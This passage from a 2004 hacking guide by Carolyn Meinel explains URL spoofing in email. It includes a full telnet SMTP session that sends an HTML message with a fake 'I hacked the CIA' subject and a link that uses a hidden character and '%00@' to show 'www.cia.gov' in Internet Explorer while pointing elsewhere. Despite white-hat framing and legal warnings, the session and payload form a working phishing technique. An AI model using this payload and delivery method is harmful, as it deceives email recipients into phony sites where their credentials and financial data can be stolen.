You may have noticed I didn't give exact instructions for how to send emails with working code to spoof URLs. That's because spoofed URLs in email are too easy to use to commit crime.
Also, you may wonder why we are offering so many different ways to spoof URLs. The reason is that over time the browser and antivirus companies will come up with ways to defeat one spoofing scheme after another. It is up to white hat hackers to keep on finding and publicizing new spoofing schemes in order to force those responsible to fix these vulnerabilities. If we don't do this, criminal hackers will secretly use URL spoofing to do tremendous harm.
I'm willing to provide at least some help for those who are serious about doing legal hacking experiments. If you have email clients you would like to test against URL spoofing exploits of this Guide, or if you want to experiment with other weird coding schemes in email, here's one way to embed the test code of your choice.
*** First, you need to be using an online server that provides you with an SMTP or ESMPT-protocol compatible email server. Hotmail and AOL won't work.
*** Second, you might need to use your real email address. As a protection against spammers, some email servers won't accept emails with false sender addresses.
*** Third, as a protection against spammers, some email servers will disconnect you if you mistype something. And although backspacing to erase seems to work with most telnet clients, it doesn't really work. So if you mistype something, it's better to disconnect and start over.
Here's an example of how to embed funny code in your email. Bring up a DOS or terminal window and type:
telnet mail.foobar.com 25
(Substitute the name of your online service provider for foobar.com.)
Following is a copy of an actual email forging session. The lines with numbers in front of them are what the mail server sent, and the lines without numbers are the commands you would give:
220 foobar.com VopMail ESMTP Receiver Version 5.1.202.0 Ready
helo cmeinel@fubar.com
250 OK
mail from:cmeinel@foobar.com
250 cmeinel@abq.com OK
rcpt to:cmeinel@techbroker.com
250 cmeinel@techbroker.com OK
data
354 Ready for data
Subject: Muhahaha! I hacked the CIA web site!!!!
Content-Type: text/html;
<HEAD>
<TITLE>Trick web page</TITLE>
</HEAD>
<BODY>
<BODY BGCOLOR="#ffffff">
<a href="http://www.cia.gov�%00@happyhacker.org/" style="font: 8pt verdana, sans-serif;">
Click here to see the hacked CIA website!
</a>
</BODY>
</HTML>
.
250 Message received OK
QUIT
221 foobar.com closing
Don't forget that lone period at the end of the text. You have to hit enter, then type a period, then hit enter again to send your email.
Evil genius tip: There is a trick to getting this email to work. There is an funny character in the URL that probably looks like a box on your browser. Thanks to this funny character, even the bar at the bottom of IE will display only "www.cia.gov" when loading this spoofed URL in IE. Criminals could use this to trick thousands of people into giving them their bank account and credit card information.
You can go to jail warning: It is legal to discover and publicize ways to encode a button that tricks people into going to a phony web site. It is a crime, however, if someone uses this to steal from people or violate their privacy.
So far Microsoft hasn't seen fit to fix this vulnerability in IE. So there is a good chance the soon some criminal will take advantage of this to steal lots of money and passwords. But since you have read this, you will be able to avoid becoming a victim by using a safe browser such as Mozilla.
A shoutout to Alex, who pointed out that the Opera browser is immune to the URL spoofing of this Guide, and to astronut, who pointed out my "duh" moment -- use the URL of the site you are spoofing with the "onMouseOver" command. Another shout out goes to Robert Wilson, who helped me perfect the trick with the "�" character. And I (Carolyn Meinel) hope to heck you readers appreciated this Guide, because thanks to that funny character I had to code this Guide by hand on a Unicode-friendly editor instead of using a web page editor. Groan.
Further reading:
The Secunia advisory on URL spoofing
Steps that you can take to help identify and to help protect yourself from deceptive (spoofed) Web sites and malicious hyperlinks: Microsoft (Note: it doesn't tell you how to avoid being tricked by the email code shown above.)
Where are those back issues of GTMHHs? Check out the official Happy Hacker Web page "http://www.happyhacker.org". We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. But we hate computer crime. So don't email us about any crimes you may have committed or may want to commit!
Copyright 2004 Carolyn Meinel. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.